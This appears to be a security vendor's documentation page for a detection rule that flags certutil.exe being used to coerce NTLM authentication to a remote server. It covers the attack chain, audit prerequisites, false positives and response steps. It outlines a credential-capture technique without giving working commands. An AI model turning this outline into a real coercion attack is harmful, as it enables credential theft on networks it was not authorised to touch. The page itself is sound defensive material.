Potential NTLM Coercion Via Certutil.EXE

About the rule

Rule Type

Standard

Rule Description

Certutil.exe is a legitimate Windows utility often abused by attackers for lateral movement and credential access. In this technique, certutil is used to access a remote resource that triggers an automatic NTLM authentication attempt. This coerces the system to send NTLM credentials to the attacker-controlled server, potentially enabling credential relay or capture. Such behavior is uncommon in legitimate use cases and is a hallmark of red team operations or early-stage credential harvesting by sophisticated adversaries.

Severity

Trouble

Rule journey

Attack chain scenario

Initial access → Execution → LOLBins abuse → certutil.exe used to access remote UNC path → NTLM authentication attempt triggered → NTLM hash capture or relay → Credential compromise → Lateral movement or privilege escalation

Impact

• Credential theft
• Privilege escalation
• Lateral movement
• Defense evasion
• Domain trust abuse

Rule Requirement

Prerequisites

Using Windows event viewer:
To enable detailed process tracking in a domain environment, log in to a domain controller using domain admin credentials and open the Group Policy Management Console (GPMC). Create or edit a GPO linked to the target OU and navigate to the Advanced Audit Policy Configuration section to enable success auditing for both process creation and termination. To capture command-line details, enable the Include command line in process creation events setting under Audit Process Creation. Additionally, create the Microsoft-Windows-Security-Auditing/Operational registry key in the specified EventLog path to support enhanced auditing.

Using Sysmon:
To enable detailed process monitoring using Sysmon, first download and install it from Microsoft Sysinternals. Run Command Prompt as an administrator and install Sysmon with a configuration file that includes process creation tracking using sysmon.exe -i [configfile.xml]. Ensure your configuration includes a <ProcessCreate> filter to capture all process creation events. Additionally, create the Microsoft-Windows-Sysmon/Operational registry key under the EventLog path if it doesn’t already exist.

Criteria

Detection

Execution Mode

realtime

Log Sources

Windows

MITRE ATT&CK

Defense Evasion: System Binary Proxy Execution (T1218)

Security Standards

Enabling this rule will help you meet the security standard's requirements listed below:

ID.RA-01: Vulnerabilities in assets are identified, validated, and recorded

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified of certutil.exe being used in a way that may attempt to coerce NTLM authentication to a remote server—a known technique for capturing hashed credentials.

Author

Nasreddine Bencherchali (Nextron Systems)

Future actions

Known False Positives

This rule may be triggered by legitimate administrative tasks where certutil.exe accesses network shares using UNC paths for file transfers, updates, or diagnostics.

Next Steps

When this rule is triggered, the following measures can be implemented:

• Identification: Review the certutil.exe command-line arguments to determine whether the remote server is internal or unknown and whether the access aligns with expected administrative behavior.
• Analysis: Correlate the activity with known users, systems, and timeframes. Check for subsequent authentication attempts, lateral movement, or abnormal SMB traffic to suspicious IPs.
• Response: Isolate the affected host, investigate the targeted remote system, and reset any potentially compromised credentials. Block outbound SMB (TCP 445) where not needed, and audit for other coercion attempts in recent logs.
• Restrict use of NTLM: Disable NTLM where feasible or restrict its use via Group Policy.

Mitigation